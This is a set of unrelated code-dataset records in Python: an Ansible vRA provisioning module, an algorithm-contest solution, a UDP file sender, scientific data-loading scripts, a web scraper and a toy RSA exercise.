module_args = dict(\n host=dict(type='str', required=True),\n username=dict(type='str', required=True),\n password=dict(type='str', required=True, no_log=True),\n tenant=dict(type='str', required=False, default=DEFAULT_TENANT),\n blueprint_name=dict(type='str', required=False),\n memory=dict(type='str', required=False, default=DEFAULT_MEMORY),\n cpu_count=dict(type='str', required=False, default=DEFAULT_CPUS),\n number_of_instances=dict(type='str', required=False, default='1'),\n wait_for_vm=dict(type='str', required=False, default=False),\n validate_certs=dict(type='str', required=False)\n )\n\n body_format = 'json'\n body = ''\n body_json = {}\n output = {'headers': '',\n 'url': '',\n 'bearer_token': '',\n 'catalog_items': {},\n 'blueprint_catalog_item_id': '',\n 'blueprint_item': {},\n 'blueprint_template': {},\n 'response': {}}\n\n # seed the result dict in the object\n # we primarily care about changed and state\n # change is if this module effectively modified the target\n # state will include any data that you want your module to pass back\n # for consumption, for example, in a subsequent 
task\n result = dict(\n result_text='',\n output=''\n )\n\n # the AnsibleModule object will be our abstraction working with Ansible\n # this includes instantiation, a couple of common attr would be the\n # args/params passed to the execution, as well as if the module\n # supports check mode\n module = AnsibleModule(\n argument_spec=module_args,\n supports_check_mode=True\n )\n\n host = module.params['host']\n username = module.params['username']\n password = module.params['password']\n tenant = module.params['tenant']\n blueprint_name = module.params['blueprint_name']\n memory = module.params['memory']\n cpu_count = module.params['cpu_count']\n number_of_instances = module.params['number_of_instances']\n body_format = 'json'\n body = ''\n body_json = {}\n output = {'headers': '',\n 'url': '',\n 'bearer_token': '',\n 'catalog_items': {},\n 'blueprint_catalog_item_id': '',\n 'blueprint_item': {},\n 'blueprint_template': {},\n 'response': {}}\n\n #===========================================================================\n # The first step is to get the bearer token.\n #===========================================================================\n method = 'POST'\n url = 'https://' + host + '/identity/api/tokens'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json'}\n body_json = {'username': username,\n 'password': password,\n 'tenant': tenant}\n body = json.dumps(body_json)\n\n # Make the REST call to get the bearer token.\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n response_json = json.loads(response_content)\n bearer_token = response_json[\"id\"]\n\n output['bearer_token'] = bearer_token\n\n #===========================================================================\n # Get the list of catalog items.\n #===========================================================================\n method = 'GET'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItemViews'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n catalog_items = json.loads(response_content)['content']\n\n # Find the catalog item that matches the blueprint name passed into this\n # module.\n blueprint_item = {}\n for catalog_item in catalog_items:\n if catalog_item['name'] == blueprint_name:\n blueprint_item = catalog_item\n\n if blueprint_item:\n blueprint_catalog_item_id = blueprint_item['catalogItemId']\n\n output['blueprint_item'] = blueprint_item\n output['blueprint_catalog_item_id'] = blueprint_catalog_item_id\n else:\n raise Exception(\"Blueprint could not be found\")\n\n #===========================================================================\n # Get the blueprint template using the catalog ID.\n #===========================================================================\n method = 'GET'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItems/' + blueprint_catalog_item_id + '/requests/template'\n headers = {'Accept':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=body,\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n response_content = response.read()\n blueprint_template = 
json.loads(response_content)\n\n output['blueprint_template'] = blueprint_template\n\n #===========================================================================\n # Update the template with the new values supplied by the user.\n #===========================================================================\n blueprint_data_item_name = blueprint_name.replace(' ', '_')\n memory_path = 'data/' + blueprint_data_item_name + '/data/memory'\n cpus_path = 'data/' + blueprint_data_item_name + '/data/cpu'\n number_of_instances_path = 'data/_number_of_instances'\n\n memory_path_list = memory_path.split('/')\n cpus_path_list = cpus_path.split('/')\n number_of_instances_list = number_of_instances_path.split('/')\n\n set_json_value(blueprint_template, memory_path_list, memory)\n set_json_value(blueprint_template, cpus_path_list, cpu_count)\n set_json_value(blueprint_template, number_of_instances_list, number_of_instances)\n\n #===========================================================================\n # Submit the modified blueprint template to provision the VM.\n #===========================================================================\n method = 'POST'\n url = 'https://' + host + '/catalog-service/api/consumer/entitledCatalogItems/' + blueprint_catalog_item_id + '/requests'\n headers = {'Accept':'application/json',\n 'Content-Type':'application/json',\n 'Authorization':'Bearer ' + bearer_token}\n\n # Make the request\n response, info = fetch_url(module,\n url,\n data=json.dumps(blueprint_template),\n headers=headers,\n method=method,\n timeout=SOCKET_TIMEOUT)\n\n output['response'] = response\n output['url'] = url\n output['headers'] = headers\n response_content = response.read()\n blueprint_template = json.loads(response_content)\n\n # If the user is working with this module in only check mode we do not\n # want to make any changes to the environment, just return the current\n # state with no modifications\n if module.check_mode:\n return result\n\n # Use whatever logic you need to determine whether or not this module\n # made any modifications to your target\n if module.params['host']:\n result['changed'] = True\n\n # during the execution of the module, if there is an exception or a\n # conditional state that effectively causes a failure, run\n # AnsibleModule.fail_json() to pass in the message and the result\n if module.params['host'] == 'fail me':\n module.fail_json(msg='You requested this to fail', **result)\n\n #result['output'] = output\n\n # in the event of a successful module execution, you will want to\n # simple AnsibleModule.exit_json(), passing the key/value results\n module.exit_json(**result)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tblackwell/ansible-vra-rest","sub_path":"modules/vravm.py","file_name":"vravm.py","file_ext":"py","file_size_in_byte":11230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
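`set_json_value` in the Ansible module above mutates a nested dict in place by walking a path list. A standalone usage example with a made-up blueprint fragment, mirroring the `data/<blueprint>/data/memory` paths the module builds, shows the intent:

```python
def set_json_value(json, path_list, new_value):
    """Walk the nested dict along path_list and overwrite the final key."""
    if len(path_list) > 1:
        set_json_value(json[path_list.pop(0)], path_list, new_value)
    else:
        json[path_list[0]] = new_value

# Hypothetical blueprint fragment mirroring the paths built in the module.
template = {"data": {"My_Blueprint": {"data": {"memory": 512, "cpu": 1}}}}
set_json_value(template, "data/My_Blueprint/data/memory".split("/"), 2048)
print(template["data"]["My_Blueprint"]["data"]["memory"])  # 2048
```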
+{"seq_id":"21860069898","text":"import sys\r\nfrom collections import defaultdict, deque\r\n\r\ninput = sys.stdin.readline\r\n\r\nn, m, k = map(int, input().split())\r\n\r\nground = defaultdict(deque)\r\n\r\nnutrition = [\r\n [5] * n\r\n for _ in range(n)\r\n]\r\n\r\nplus_nutrition = [\r\n list(map(int, input().split()))\r\n for _ in range(n)\r\n]\r\n\r\nfor _ in range(m):\r\n x, y, z = map(int, input().split())\r\n # 인덱스를 맞추기 위해 1씩 차감\r\n x -= 1; y -= 1\r\n \r\n # 나무 나이 삽입\r\n ground[(x, y)].append(z)\r\n \r\n# 봄 -> 나무가 자신의 위치에서 나이만큼 양분을 먹고 나이 1 증가\r\n# 그것이 안된다면 죽고, 여름에 해당 위치에 양분으로 남음\r\ndef spring_and_summer(): \r\n # key : 나무가 심어진 좌표 튜플\r\n for key in list(ground.keys()):\r\n x, y = key\r\n # 해당 좌표에 새로 기록할 나무 나이 정보\r\n temp_deque = deque()\r\n \r\n # 현재 좌표에서 죽은 나무\r\n dead_tree = 0\r\n \r\n # 나이가 어린 나무부터 양분을 먹음\r\n for tree_age in ground[key]:\r\n # 양분을 먹을 수 있는 경우 나이만큼 먹고 임시 힙에 삽입\r\n if nutrition[x][y] >= tree_age:\r\n temp_deque.append(tree_age+1) # 임시 큐에 저장\r\n nutrition[x][y] -= tree_age\r\n \r\n # 먹을 수 없다면 죽음\r\n else:\r\n dead_tree += tree_age // 2\r\n\r\n # 새로 기록한 나무 나이 저장\r\n ground[key] = temp_deque\r\n \r\n # 해당 위치에서 죽은 나무로 양분 추가\r\n nutrition[x][y] += dead_tree\r\n\r\n\r\n# 가을에는 나이가 5배수인 나무가 주변 8칸으로 번식\r\ndef autumn_and_winter():\r\n # 나무가 번식하는 주변 위치\r\n dxs = [-1, -1, -1, 0, 0, 1, 1, 1]\r\n dys = [-1, 0, 1, -1, 1, -1, 0, 1]\r\n \r\n for key in list(ground.keys()):\r\n x, y = key\r\n for tree_age in ground[key]:\r\n if tree_age % 5 != 0:\r\n continue\r\n \r\n # 주변 8칸으로 나이가 1인 나무 번식\r\n for dx, dy in zip(dxs, dys):\r\n nx, ny = x + dx, y + dy\r\n \r\n # 땅을 벗어나지 않는다면 해당 칸으로 번식\r\n if 0 <= nx < n and 0 <= ny < n:\r\n ground[(nx, ny)].appendleft(1)\r\n \r\n # 겨울에는 로봇이 땅을 돌아다니며 양분을 추가함\r\n for x in range(n):\r\n for y in range(n):\r\n nutrition[x][y] += plus_nutrition[x][y]\r\n \r\n \r\n# k년 동안 계절 사이클을 반복 후 전체 나무의 개수를 구한다.\r\nfor _ in range(k):\r\n spring_and_summer()\r\n autumn_and_winter()\r\n\r\nanswer = 0\r\nfor key in list(ground.keys()):\r\n answer += len(ground[key])\r\n \r\nprint(answer)","repo_name":"KimChanw/Python_Algorithm","sub_path":"백준/Gold/16235. 나무 재테크/나무 재테크.py","file_name":"나무 재테크.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12566628400","text":"import sys\r\nimport socket\r\nimport time\r\nimport argparse\r\nfrom STPSegment import STPSegment\r\n\r\nclass Sender:\r\n def __init__(self, sender_port, receiver_port, file_to_send, max_win, rto):\r\n self.sender_port = sender_port\r\n self.receiver_port = receiver_port\r\n self.file_to_send = file_to_send\r\n self.max_win = max_win\r\n self.rto = rto\r\n\r\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n self.sock.bind(('localhost', self.sender_port))\r\n self.sock.settimeout(0.5)\r\n self.ISN = 0\r\n self.log_file = open(\"sender_log.txt\", \"w\")\r\n self.start_time = None\r\n\r\n def log(self, snd_rcv, packet_type, seq_num, num_bytes):\r\n current_time = time.time()\r\n elapsed_time = round(current_time - self.start_time, 5) if self.start_time is not None else 0\r\n pack_type = \"DATA\"\r\n\r\n if packet_type==1:\r\n pack_type = \"ACK\"\r\n elif packet_type==2:\r\n pack_type = \"SYN\"\r\n elif packet_type==3:\r\n pack_type = \"FIN\"\r\n elif packet_type==4:\r\n pack_type = \"RESET\"\r\n\r\n log_str = f\"{snd_rcv} {elapsed_time}s {pack_type} {seq_num} {num_bytes}\\n\"\r\n self.log_file.write(log_str)\r\n\r\n # DATA = 0, ACK = 1, SYN = 2, FIN = 3, RESET = 4\r\n def send_syn(self, seq_num):\r\n segment = STPSegment(seq_num=seq_num, segment_type=2)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 2, seq_num, 0)\r\n \r\n\r\n def send_fin(self, seq_num):\r\n segment = STPSegment(seq_num=seq_num, segment_type=3)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n\r\n self.log(\"snd\", 3, seq_num, 0)\r\n\r\n def connection_establish(self):\r\n retry_count = 0\r\n self.start_time = time.time()\r\n while retry_count < 3:\r\n try:\r\n self.send_syn(self.ISN)\r\n \r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n\r\n if segment.segment_type==1:\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n \r\n self.ISN = self.ISN + 1\r\n return True\r\n \r\n except socket.timeout:\r\n print(\"SOCKET TIMEOUT DURING CONNECTION ESTABLISHING\")\r\n retry_count += 1\r\n \r\n return False\r\n \r\n def connection_terminate(self):\r\n retry_count = 0\r\n while retry_count < 3:\r\n try:\r\n self.send_fin(self.ISN)\r\n \r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n if segment.segment_type==1 and segment.seq_num==self.ISN + 1:\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n\r\n self.ISN = self.ISN + 1\r\n return True\r\n \r\n except socket.timeout:\r\n print(\"SOCKET TIMEOUT DURING CONNECTION TERMINATION\")\r\n retry_count += 1\r\n \r\n return False\r\n\r\n def send_data(self):\r\n if self.connection_establish():\r\n with open(self.file_to_send, 'rb') as file:\r\n filedata = file.read(1000)\r\n while filedata:\r\n segment = STPSegment(seq_num=self.ISN, payload=filedata, segment_type=0)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 0, self.ISN, len(filedata))\r\n # new seq num if the send works\r\n temp_seq = self.ISN + len(filedata)\r\n\r\n ack_received = False\r\n\r\n while not ack_received:\r\n try:\r\n data, _ = self.sock.recvfrom(4096)\r\n segment = STPSegment.from_bytes(data)\r\n self.log(\"rcv\", 1, segment.seq_num, 0)\r\n\r\n if segment.seq_num >= temp_seq:\r\n # The seq number in the ack matches or is ahead of the one we are about to send out\r\n ack_received = True\r\n self.ISN = segment.seq_num\r\n temp_seq = segment.seq_num\r\n else:\r\n # oh our dat wasnt 
lost their ack was lost so now they're ahead of us\r\n pass\r\n \r\n except socket.timeout:\r\n # Didnt receive an ack so we can only assume our sent data was lost so resend\r\n segment = STPSegment(seq_num=self.ISN, payload=filedata, segment_type=0)\r\n self.sock.sendto(segment.to_bytes(), ('localhost', self.receiver_port))\r\n self.log(\"snd\", 0, self.ISN, len(filedata))\r\n\r\n self.ISN = temp_seq\r\n time.sleep(0.05)\r\n filedata = file.read(1000)\r\n \r\n # Send the end of transmission segment with FIN flag\r\n if self.connection_terminate():\r\n print(\"COMPLETE PROGRAM\")\r\n \r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description='Sender')\r\n parser.add_argument('sender_port', type=int, help='Sender port number')\r\n parser.add_argument('receiver_port', type=int, help='Receiver port number')\r\n parser.add_argument('file_to_send', type=str, help='File to send')\r\n parser.add_argument('max_win', type=int, help='Max Window Size in bytes')\r\n parser.add_argument('rto', type=str, help='Retransmission time')\r\n args = parser.parse_args()\r\n\r\n sender = Sender(args.sender_port, args.receiver_port, args.file_to_send, args.max_win, args.rto)\r\n sender.send_data()\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"mira-moonbeam/simpleSTPwithSlidingWindow","sub_path":"Sender.py","file_name":"Sender.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9094876651","text":"import numpy as np\nimport xarray as xr\nfrom datetime import datetime \nfrom datetime import timedelta\nfrom datetime import date\nimport time\n\nimport numpy as np\nimport xarray as xr\nfrom datetime import datetime \nfrom datetime import timedelta\nfrom datetime import date\nimport time\n\nimport pandas as pd\n\ndef sel_train_data_lead(nc_in_file,target_len,\n s_target_date,e_target_date,\n rw_1,lead_time,rw,ntimestep):\n '''\n This function inputs a 2-D file.nc, reads it as a xarray and creates\n a predictor array. 1_D:time, 2_D:features\n \n The length of the target time series must be given (target_len).\n The start date and end date that we want to predict must be given \n (e.g., s_target_date='16-10-1980', e_target_date='16-12-2021') and\n the running window that was already applied on the predictors with center=False must be\n declared (rw_1). \n \n The predictor is selected in a way so that the \n needed date is predicted at a certain lead time (lead_time) and for a specific running\n window that was applied on the target with center=True (rw). If center=False, then set rw=0.\n Moreover, a selected time step for the LSTM \n is considered (ntimestep).\n '''\n \n print('starting')\n\n SDD = int(s_target_date[0:2])\n SMM = int(s_target_date[3:5])\n SYY=int(s_target_date[6:10])\n print('start target date',SDD,SMM,SYY)\n\n EDD = int(e_target_date[0:2])\n EMM = int(e_target_date[3:5])\n EYY = int(e_target_date[6:10])\n print('end target',EDD,EMM,EYY)\n\n half_rw = int(rw/2)\n \n # Create correctly formated datetime\n date_target = datetime.strftime(datetime(year=SYY,month=SMM,day=SDD), \"%Y.%m.%d\")\n \n # Initialize shape of the final predictor array\n \n pc_predictor = [] # np.ndarray((target_len,ntimestep,int(nc_in_file[var_name].shape[1])))\n time_list = []\n it = 0\n ii = 0\n YYY = SYY\n while YYY < EYY+1:\n if YYY not in [2005,2007,2018,2004,2006]:\n date_start = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")- timedelta(days=half_rw+lead_time+rw_1+ntimestep-1),\"%Y.%m.%d\")\n date_end = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")- timedelta(days=half_rw+lead_time+rw_1),\"%Y.%m.%d\")\n #print(date_target,date_start,date_end,it)\n f = nc_in_file.sel(time = slice(date_start,date_end))\n f=f.assign_coords(time=range(ntimestep))\n time_list.append(date_target)\n pc_predictor.append(f)\n if date_target == datetime.strftime(datetime(year=YYY,month=EMM,day=EDD),\"%Y.%m.%d\"):\n YYY = YYY+1\n date_target = datetime.strftime(datetime(year=YYY,month=SMM,day=SDD), \"%Y.%m.%d\")\n it = 0\n #print(YYY)\n else:\n it = 1\n ii = ii+1\n date_target = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")+timedelta(days=it),\"%Y.%m.%d\") \n pc_predictor = xr.concat(pc_predictor,\"new_time\").rename({\"time\":\"lag\"}).rename({\"new_time\":\"time\"})\n pc_predictor = pc_predictor.assign_coords(time=time_list)\n pc_predictor = pc_predictor.assign_coords(time=pd.DatetimeIndex(pc_predictor.time)) #-pd.Timedelta(\"15 d\"))\n #print('pc_predictor_shape',pc_predictor.shape)\n return pc_predictor\n ","repo_name":"ZhengWinnieWu/Lorentz_workshop","sub_path":"L_functions.py","file_name":"L_functions.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"35352813903","text":"def XYToCell(self, x, y):\n # For virtual grids, XYToCell doesn't work properly\n # For some reason, the width and heights of the labels\n # are not computed properly and thw row and column\n # returned are computed as if the window wasn't\n # scrolled\n # This function replaces XYToCell for Virtual Grids\n\n rowwidth = self.GetGridRowLabelWindow().GetRect().width\n colheight = self.GetGridColLabelWindow().GetRect().height\n yunit, xunit = self.GetScrollPixelsPerUnit()\n xoff = self.GetScrollPos(wxHORIZONTAL) * xunit\n yoff = self.GetScrollPos(wxVERTICAL) * yunit\n\n # the solution is to offset the x and y values\n # by the width and height of the label windows\n # and then adjust by the scroll position\n # Then just go through the columns and rows\n # incrementing by the current column and row sizes\n # until the offset points lie within the computed\n # bounding boxes.\n x += xoff - rowwidth\n xpos = 0\n for col in range(self.GetNumberCols()):\n nextx = xpos + self.GetColSize(col) \n if xpos <= x <= nextx:\n break\n xpos = nextx\n\n y += yoff - colheight\n ypos = 0\n for row in range(self.GetNumberRows()):\n nexty = ypos + self.GetRowSize(row)\n if ypos <= y <= nexty:\n break\n ypos = nexty\n\n return row, col\n\n \t \t \n","repo_name":"wxWidgets/trac-attachments","sub_path":"ticket/45c/45ce120feaa2c1a2bb53db6c8fb833e58d6bb661/7c3dd4f6fb82b99043a8469a03b13ed7d8561bc9.py","file_name":"7c3dd4f6fb82b99043a8469a03b13ed7d8561bc9.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"37137386899","text":"import argparse\nparser = argparse.ArgumentParser(prog='subset_pheno_covar_by_indiv.py', description='''\n Input1: pheno_covar table obtained from ukbREST along with post-QCs\n Input2: YAML file defining which columns are phenotypes and covariates\n Input3: a list of individual ID\n Output: the phenotype and covariate for the subset of individuals\n''')\n\nparser.add_argument('--pheno-covar-csv', required=True, help='''\n Phenotype table obtained from ukbREST \n''')\nparser.add_argument('--pheno-covar-yaml', required=True, help='''\n YAML file telling which columns are phenotype and covariates\n''')\nparser.add_argument('--indiv-list', required=True, help='''\n The list of individuals (it can have several columns but the first one \n will be treated as individual ID)\n''')\nparser.add_argument('--output-pheno', required=True, help='''\n Phenotype table for subset individuals\n''')\nparser.add_argument('--output-covar', required=True, help='''\n Covariate table for subset individuals\n''')\nparser.add_argument('--indiv-colname', default='eid', help='''\n Column name of individual ID in input\n''')\n\nargs = parser.parse_args()\n\nimport pandas as pd\nimport numpy as np\nimport h5py\nimport logging, os, time, sys\nimport my_hail_helper as hail_helper\nimport gwas_helper\n\n\n# configing util\nlogging.basicConfig(\n level = logging.INFO, \n stream = sys.stderr, \n format = '%(asctime)s %(message)s',\n datefmt = '%Y-%m-%d %I:%M:%S %p'\n)\n\n# load phenotypes and covariates (Exactly the same as gwas_build_pheno_and_covar.py)\nlogging.info('Start loading phenotypes and covariates (the full table)')\npheno_covar_dic = gwas_helper.read_yaml(args.pheno_covar_yaml)\ncovar_names = pheno_covar_dic['covar_names'] # 'age_recruitment,sex,pc1,pc2'\npheno_names = pheno_covar_dic['pheno_names'] # 'ht,mcv,mch'\nindiv_id = pheno_covar_dic['indiv_id'] # 'eid'\nint_names = pheno_covar_dic['int_names'] # 'age_recruitment,sex'\nstr_names = pheno_covar_dic['str_names'] # 'eid'\nlogging.info('--> Read in CSV file as data.frame')\ntstart = time.time()\ncovar, trait = hail_helper.read_and_split_phenotype_csv(\n args.pheno_covar_csv,\n pheno_names = pheno_names,\n covar_names = covar_names,\n indiv_id = indiv_id,\n int_names = int_names,\n str_names = str_names\n)\ntend = time.time()\nlogging.info('--> Read in CSV file as data.frame FINISHED! {} seconds elapsed'.format(tend - tstart))\n\n# read individual list\nlogging.info('Read individual list')\nindiv_list = hail_helper.read_indiv_list(args.indiv_list)\n\n# subsetting\ntrait_sub = hail_helper.subset_by_col(trait, args.indiv_colname, indiv_list)\ncovar_sub = hail_helper.subset_by_col(covar, args.indiv_colname, indiv_list)\n\n# save as TSV\ntrait_sub.to_csv(args.output_pheno, header = True, index = None, sep = '\\t')\ncovar_sub.to_csv(args.output_covar, header = True, index = None, sep = '\\t')\n","repo_name":"liangyy/ptrs-ukb","sub_path":"code/subset_pheno_covar_by_indiv.py","file_name":"subset_pheno_covar_by_indiv.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"40644057541","text":"'''Import tasks for the Supernova Legacy Survey.\n'''\nimport csv\nimport os\nfrom glob import glob\nfrom math import log10\n\nfrom astrocats.catalog.utils import (get_sig_digits, pbar, pbar_strings,\n pretty_num)\nfrom astropy.time import Time as astrotime\nfrom astroquery.vizier import Vizier\n\nfrom ..supernova import SUPERNOVA\n\n\ndef do_snls_photo(catalog):\n task_str = catalog.get_current_task_str()\n snls_path = os.path.join(catalog.get_current_task_repo(), 'SNLS-ugriz.dat')\n data = list(csv.reader(open(snls_path, 'r'), delimiter=' ',\n quotechar='\"', skipinitialspace=True))\n for row in pbar(data, task_str):\n flux = row[3]\n err = row[4]\n # Being extra strict here with the flux constraint, see note below.\n if float(flux) < 3.0 * float(err):\n continue\n name = 'SNLS-' + row[0]\n name = catalog.add_entry(name)\n source = catalog.entries[name].add_source(\n bibcode='2010A&A...523A...7G')\n catalog.entries[name].add_quantity(SUPERNOVA.ALIAS, name, source)\n band = row[1]\n mjd = row[2]\n sig = get_sig_digits(flux.split('E')[0]) + 1\n # Conversion comes from SNLS-Readme\n # NOTE: Datafiles avail for download suggest diff zeropoints than 30,\n # need to inquire.\n magnitude = pretty_num(30.0 - 2.5 * log10(float(flux)), sig=sig)\n e_mag = pretty_num(\n 2.5 * log10(1.0 + float(err) / float(flux)), sig=sig)\n # e_mag = pretty_num(2.5*(log10(float(flux) + float(err)) -\n # log10(float(flux))), sig=sig)\n catalog.entries[name].add_photometry(\n time=mjd, band=band, magnitude=magnitude, e_magnitude=e_mag,\n counts=flux, e_counts=err, source=source)\n\n catalog.journal_entries()\n return\n\n\ndef do_snls_spectra(catalog):\n \"\"\"\n \"\"\"\n\n task_str = catalog.get_current_task_str()\n result = Vizier.get_catalogs('J/A+A/507/85/table1')\n table = result[list(result.keys())[0]]\n table.convert_bytestring_to_unicode(python3_only=True)\n datedict = {}\n for row in table:\n datedict['SNLS-' + row['SN']] = str(astrotime(row['Date']).mjd)\n\n oldname = ''\n file_names = glob(os.path.join(catalog.get_current_task_repo(), 'SNLS/*'))\n for fi, fname in enumerate(pbar_strings(file_names, task_str)):\n filename = os.path.basename(fname)\n fileparts = filename.split('_')\n name = 'SNLS-' + fileparts[1]\n name = catalog.get_preferred_name(name)\n if oldname and name != oldname:\n catalog.journal_entries()\n oldname = name\n name = catalog.add_entry(name)\n source = catalog.entries[name].add_source(\n bibcode='2009A&A...507...85B')\n catalog.entries[name].add_quantity(SUPERNOVA.ALIAS, name, source)\n\n catalog.entries[name].add_quantity(\n SUPERNOVA.DISCOVER_DATE, '20' + fileparts[1][:2], source)\n\n f = open(fname, 'r')\n data = csv.reader(f, delimiter=' ', skipinitialspace=True)\n specdata = []\n for r, row in enumerate(data):\n if row[0] == '@TELESCOPE':\n telescope = row[1].strip()\n elif row[0] == '@REDSHIFT':\n catalog.entries[name].add_quantity(\n SUPERNOVA.REDSHIFT, row[1].strip(), source)\n if r < 14:\n continue\n specdata.append(list(filter(None, [x.strip(' \\t') for x in row])))\n specdata = [list(i) for i in zip(*specdata)]\n wavelengths = specdata[1]\n\n fluxes = [pretty_num(float(x) * 1.e-16, sig=get_sig_digits(x))\n for x in specdata[2]]\n # FIX: this isnt being used\n # errors = [pretty_num(float(x)*1.e-16, sig=get_sig_digits(x)) for x in\n # specdata[3]]\n\n catalog.entries[name].add_spectrum(\n u_wavelengths='Angstrom', u_fluxes='erg/s/cm^2/Angstrom',\n wavelengths=wavelengths,\n fluxes=fluxes, u_time='MJD' if name in datedict else '',\n 
time=datedict[name] if name in datedict else '',\n telescope=telescope, source=source,\n filename=filename)\n if catalog.args.travis and fi >= catalog.TRAVIS_QUERY_LIMIT:\n break\n catalog.journal_entries()\n return\n","repo_name":"finzellt/novae","sub_path":"tasks/snls.py","file_name":"snls.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
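The SNLS photometry loop earlier in that record converts fluxes to magnitudes with a fixed 30.0 zeropoint, and the task's own comment flags that zeropoint as needing confirmation. Pulled out of the catalog machinery, the conversion is just the following, shown here as a standalone sketch:

```python
from math import log10

ZEROPOINT = 30.0  # value used in the record; the readme caveat noted there still applies

def flux_to_mag(flux, flux_err):
    """Convert a flux and its error to a magnitude and magnitude error."""
    magnitude = ZEROPOINT - 2.5 * log10(flux)
    e_magnitude = 2.5 * log10(1.0 + flux_err / flux)
    return magnitude, e_magnitude

print(flux_to_mag(1000.0, 50.0))  # (22.5, ~0.053)
```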
+{"seq_id":"28833424054","text":"from bs4 import BeautifulSoup\nimport requests\n\n# find the most upvoted entry\n\nresponse = requests.get(\"https://news.ycombinator.com\")\nyc_web_page = response.text\n\nsoup = BeautifulSoup(yc_web_page, \"html.parser\")\n\narticles = soup.find_all(name=\"a\", rel=\"noreferrer\")\n\n\narticle_link = []\narticle_text = []\n\nfor article_tag in articles:\n article_link.append(article_tag.get(\"href\"))\n article_text.append(article_tag.getText())\n\nupvote =[score.getText() for score in soup.find_all(name=\"span\", class_=\"score\")]\narticle_upvote = [int(score.split()[0]) for score in upvote]\n\n# print(article_text)\n# print(article_link)\n# print(article_upvote)\n\n\nindex_of_max = article_upvote.index(max(article_upvote))\nprint(index_of_max+1)\nprint(article_text[index_of_max])\nprint(article_link[index_of_max])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ulkat/100daysofpython","sub_path":"day-45 Web Scraping/bs4-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13084985930","text":"def encode(p):\n m = ''\n for i in range(len(p)):\n a = ord(p[i])\n if a == 32:\n a = 64\n a -= 64\n if a == 0:\n m += '00'\n elif a < 10:\n m += '0' + str(a)\n else:\n m += str(a)\n\n return m\n\ndef decode(p):\n m = ''\n\n for i in range(0, len(p), 2):\n a = int(p[i:i+2]) + 64\n if a == 64:\n a = 32\n m += chr(a)\n\n return m\n\n\ndef encipher(p, n, pk):\n c = ''\n i = 0\n\n while i < len(p):\n m = ''\n for j in range(4):\n m += p[i+j]\n i += 4\n a = int(m)\n t = a\n for k in range(pk):\n b = t % n\n t = a * b\n if b < 10:\n c += '000' + str(b)\n elif b < 100:\n c += '00' + str(b)\n elif b < 1000:\n c += '0' + str(b)\n else:\n c += str(b)\n\n return c\n\ndef decipher(p, n, sk):\n c = ''\n i = 0\n\n while i < len(p):\n m = ''\n for j in range(4):\n m += p[i+j]\n i += 4\n a = int(m)\n t = a\n for k in range(sk):\n b = t % n\n t = a * b\n if b < 10:\n c += '000' + str(b)\n elif b < 100:\n c += '00' + str(b)\n elif b < 1000:\n c += '0' + str(b)\n else:\n c += str(b)\n\n return c\n\n\nplainText = 'SAVE PRIVATE RYAN '\n\nN = 3713\n# 공개키\nS = 97\n# 비밀키\nP = 37\nplainMessage = encode(plainText)\n\nprint('평문 : ', plainMessage)\ncipherMessage = encipher(plainMessage, N, P)\nprint('암호문 : ', cipherMessage)\ndecipherMessage = decipher(cipherMessage, N, S)\nprint('복호문 : ', decipherMessage)\n\ndecodeMessage = decode(decipherMessage)\nprint('��호된 내용 : ', decodeMessage)\n","repo_name":"EEDK/2020-2-INUCS-Algorithm","sub_path":"stringAlgorithm/RSAencipher.py","file_name":"RSAencipher.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
